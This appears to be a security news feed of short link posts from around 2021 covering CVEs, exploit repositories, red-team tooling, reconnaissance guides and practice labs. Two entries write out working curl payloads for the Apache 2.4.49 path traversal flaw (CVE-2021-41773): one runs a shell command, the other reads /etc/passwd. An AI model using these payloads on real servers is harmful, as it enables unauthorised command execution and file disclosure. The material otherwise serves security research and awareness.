APT

CVE-2021-26420: Remote Code Execution in Sharepoint via workflow compilation 👤 by The ZDI Research Team In June of 2021, Microsoft released a patch to correct CVE-2021-26420 – a remote code execution bug in the supported versions of Microsoft SharePoint Server. This bug was reported to the ZDI program by an anonymous researcher and is also known as ZDI-21-755. This blog takes a deeper look at the root cause of this vulnerability. This vulnerability could be used by an authenticated user to execute arbitrary .NET code on the server in the context and permissions of the service account of a SharePoint web application. For a successful attack, the attacker should have “Manage Lists” permissions on any SharePoint site. By default, any authenticated user can create their own site where they have the necessary permissions. 📝 Contents: • The Vulnerability • Proof of Concept • Achieving Remote Code Execution • Conclusion https://www.zerodayinitiative.com/blog/2021/10/5/cve-2021-26420-remote-code-execution-in-sharepoint-via-workflow-compilation

Certipy Python implementation for Active Directory certificate abuse https://github.com/ollypwn/Certipy #ADCS

Apache 2.4.49 Payload RCE curl --data "echo;id" 'http://127.0.0.1:55026/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'

Payload curl https://URL/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd -k

Apache HTTP Server 2.4.49 Path Traversal (CVE-2021-41773) https://twitter.com/ducnt_/status/1445386557574324234 #cve #apache

iOS 15 0day Exploits https://github.com/illusionofchaos/ios-gamed-0day https://github.com/illusionofchaos/ios-nehelper-wifi-info-0day https://github.com/illusionofchaos/ios-nehelper-enum-apps-0day #ios #0day #exploit

https://youtu.be/FiT7-zxQGbo #c2 #cpp

Information Gathering and Scanning for Sensitive Information https://0xjoyghosh.medium.com/information-gathering-scanning-for-sensitive-information-reloaded-6ff3455e0d4e #OSINT #Recon

Offensive WMI - Reconnaissance & Enumeration (Part 4) This post focuses on interacting with several WMI classes to extract useful and sensitive information https://0xinfection.github.io/posts/wmi-recon-enum/ #wmi

Awesome CobaltStrike https://github.com/zer0yu/Awesome-CobaltStrike #CobaltStrike #C2 #RedTeam

GOAD (Game Of Active Directory) GOAD is a pentest active directory LAB project. The purpose of this lab is to give pentesters a vulnerable Active directory environement ready to use to practice usual attack techniques. https://github.com/Orange-Cyberdefense/GOAD #ActiveDirectory #AD #Microsoft #Pentest #vulnerabilites

New article: "Cisco Hyperflex: How We Got RCE Through Login Form and Other Findings" Read more about critical vulnerabilities (CVSS 9.8, 7.3 and 5.3) found by our researchers Nikita Abramov & Mikhail Klyuchnikov: https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/

CVE-2021-22005 - VMWare vCenter Server File Upload to RCE https://github.com/r0ckysec/CVE-2021-22005 #cve #vCenter #RCE

How to Create an Internal/Corporate Red Team https://malcomvetter.medium.com/how-to-create-an-internal-corporate-red-team-1023027ea1e3 #redteam

reconFTW ReconFTW automates the entire process of reconnaisance for you. It outperforms the work of subdomain enumeration along with various vulnerability checks and obtaining maximum information about your target. https://github.com/six2dez/reconftw #reconFTW #bugbounty #hacking

Beginners Guide to 0day/CVE AppSec Research Walks through finding open-source web apps, environment setup, debugging for vulns, creating a Blind SQL time-based exploit, and publishing to @ExploitDB/MITRE CVE https://0xboku.com/2021/09/14/0dayappsecBeginnerGuide.html #appsec #0day #research

AzureHunter A Cloud Forensics Powershell module to run threat hunting playbooks on data from Azure and O365 https://github.com/darkquasar/AzureHunter #azure #o365

RCE in Citrix ShareFile Storage Zones Controller (CVE-2021-22941) Amazing writeup on finding a vulnerability through .NET reversing, enjoyed reading about the breakpoints that were set and how they logically owned Citrix ShareFile through a third party dependency https://codewhitesec.blogspot.com/2021/09/citrix-sharefile-rce-cve-2021-22941.html #citrix #sharefile #rce